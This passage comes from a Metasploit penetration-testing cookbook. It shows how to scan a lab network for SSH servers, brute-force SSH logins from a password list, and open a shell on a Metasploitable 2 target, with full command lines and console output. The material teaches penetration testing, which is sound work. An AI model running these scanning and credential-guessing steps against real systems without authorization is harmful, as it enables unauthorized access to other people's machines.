书名：Metasploit Penetration Testing Cookbook（Third Edition）
作者名：Daniel Teixeira Abhinav Singh Monika Agarwal
本章字数：348字
更新时间：2021-06-24 19:19:45

How to do it...

To scan for SSH servers on the network, use the auxiliary/scanner/ssh/ssh_version auxiliary module, set the target address range in RHOSTS, and the number of concurrent threads to 256:

msf > use auxiliary/scanner/ssh/ssh_version 
msf auxiliary(ssh_version) > set RHOSTS 192.168.216.0/24
RHOSTS => 192.168.216.0/24
msf auxiliary(ssh_version) > set THREADS 256
THREADS => 256
msf auxiliary(ssh_version) > run

...
[*] Scanned 133 of 256 hosts (51% complete)
[*] Scanned 232 of 256 hosts (90% complete)
[*] Scanned 250 of 256 hosts (97% complete)
[*] Scanned 255 of 256 hosts (99% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_version) >

So, in our scan, we found some active SSH versions in the target address range. Once we have discovered the SSH version, we can search for vulnerabilities for that specific version.

To search for default or guessable credentials, you can use the SSH Login Check Scanner auxiliary module to test SSH logins on a range of machines and report successful logins:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set USERNAME user
USERNAME => user
msf auxiliary(ssh_login) > set PASS_FILE /root/password.lst
PASS_FILE => /root/password.lst
msf auxiliary(ssh_login) > set RHOSTS 192.168.216.10,129
RHOSTS => 192.168.216.10,129
msf auxiliary(ssh_login) > set STOP_ON_SUCCESS true 
STOP_ON_SUCCESS => true
msf auxiliary(ssh_login) > set THREADS 256
THREADS => 256
msf auxiliary(ssh_login) > run

[*] Scanned 1 of 2 hosts (50% complete)
[+] 192.168.216.129:22 - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.216.5:39227 -> 192.168.216.129:22) at 2017-10-21 06:11:14 -0400
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >

Looking at the output, we got lucky and got a session with the credentials user:user on the Metasploitable 2 target machine.

To interact with the new session, use the sessions command with the -i option to interact with the session and supply the session ID, in this case 1:

msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

hostname
metasploitable
id
uid=1001(user) gid=1001(user) groups=1001(user)